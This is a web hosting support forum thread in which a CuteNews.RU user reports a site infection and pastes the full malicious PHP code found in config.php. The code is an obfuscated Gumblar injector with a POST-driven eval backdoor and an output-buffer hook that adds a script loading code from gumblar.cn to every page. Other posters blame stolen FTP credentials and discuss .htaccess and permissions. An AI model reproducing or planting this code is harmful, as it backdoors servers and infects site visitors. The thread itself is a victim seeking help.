Support Forum for CuteNews.RU

[nolikewise]

Hi all CNR users and team,

I'd like to share one of my bad experiences. 5 minutes ago i noticed that my website is loading content from gumblar.cn and i got it was an exploit thing.

After editting and searching all of my files, i found that

/data/config.php had a long funciton which goes like that

Code: Select all

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih5WEZWKXt2YXIgZXVUVz0oJ3ZfNjFyXzIwYV8zZF8yMl81M182M183MmlfNzB0RW5nXzY5bmVfMjJfMmNiXzNkXzIyVl82NXJfNzNfNjlfNmZuKF8yOStfMjJfMmNqXzNkXzIyXzIyXzJjdV8zZG5hdmlnYXRvXzcyXzJldXNlcl80MWdlbl83NF8zYmlmKCh1XzJlaV82ZWRleF80Zl82NihfMjJXaW5fMjIpXzNlMClfMjZfMjZfMjh1XzJlXzY5XzZlXzY0ZXhPXzY2XzI4XzIyTlRfMjA2XzIyKV8zYzApXzI2XzI2KGRvY3VtXzY1bnRfMmVjb29raWVfMmVpbmRleE9mKF8yMl82ZGlla18zZDFfMjIpXzNjMClfMjZfMjYodHlfNzBlXzZmZihfN2Fydnp0cylfMjFfM2R0Xzc5cGVvZihfMjJBXzIyXzI5KSlfN2JfN2FyXzc2enRfNzNfM2RfMjJBXzIyXzNiZXZhbChfMjJpZihfNzdpXzZlZG93XzJlXzIyXzJiYStfMjIpal8zZF82YStfMjIrXzYxXzJiXzIyTWFqXzZmcl8yMitiK2ErXzIyTV82OW5vcl8yMitfNjIrYStfMjJCdWlsXzY0XzIyK2IrXzIyal8zYl8yMilfM2JfNjRvY3VtZV82ZXRfMmV3cl82OXRfNjUoXzIyXzNjc2NyaV83MHRfMjBzXzcyY18zZF8yZl8yZmdfNzVtXzYybGFfNzJfMmVjbl8yZl83MnNfNzNfMmZfM2ZpZF8zZF8yMl8yYmorXzIyXzNlXzNjXzVjXzJmc2NyaXBfNzRfM2VfMjJfMjlfM2JfN2QnKS5yZXBsYWNlKHlYRlYsJyUnKTtldmFsKHVuZXNjYXBlKGV1VFcpKX0pKC9fL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


and it exploits and freezes browser.

How come anyone could add it in my config.php? Am i safe enough to hide my sql pass and others?

I am doubtful about filezilla coz i had the same thing before. Filezilla's bugs sometimes cause these exploits.

Any idea?

And FI-DD pls have a look that link and direct us to protect our files more...


Help my php site has been exploited or hacked. What can I do to make sure this does not happen again?
http://helpdesk.hostmonster.com/kb/inde ... d=2&id=271

[FI-DD]

All I can say is that the /data/ folder is protected by a .htaccess file. So I have no idea how this happened.

[cablegunmaster]

http://blog.unmaskparasites.com/2009/05 ... ed-script/



12 facts about this virus.

[mark99]

It's worth remembering that .htaccess is fallible, you can't reply on just that to secure the dir, there has to be a good setup of CHMODs as well as. It is possible to change the default CHMOD by fiddling with the ROOT head.php file - define('chmod', 0777); - but this makes a universal change and so can cause problems. Think I found a setting that worked but I can't recall what it was.

[Torstein]

It does however look like this is actually malware that you have on your computer that uses your FTP username and password to infect your files, so it isn't a PHP/CuteNews.RU exploit. From the link it looks like it puts code into all files on your FTP, including .htaccess, .php, .html, .js, etc.

[nolikewise]

This damn virus enters all directories which has no .htaccess file. Mayne its because FILEZILLA SHELL thing, but i don't know how they can reach the, too bad, im really nervoues!!!!!!


Can't i use a code in my root like

Code: Select all

Order Deny,Allow
Deny from all
Allow from  www.okuogren.com


and it protects all the sub directories?


Isn't there any solution to protect each folder?


Have a look at my directory it's chmod is 755:
http://www.okuogren.com/eski/index.php CLEAR NOW
http://www.okuogren.com/chat/index.php CLEAR NOW
http://safebrowsing.clients.google.com/ ... .com/eski/

[azn_romeo_4u]

It's not the script. It's your ftp. Someone gotten into your ftp and did it. Change your FTP password to something better with more characters and letters, numbers, and symbols if possible.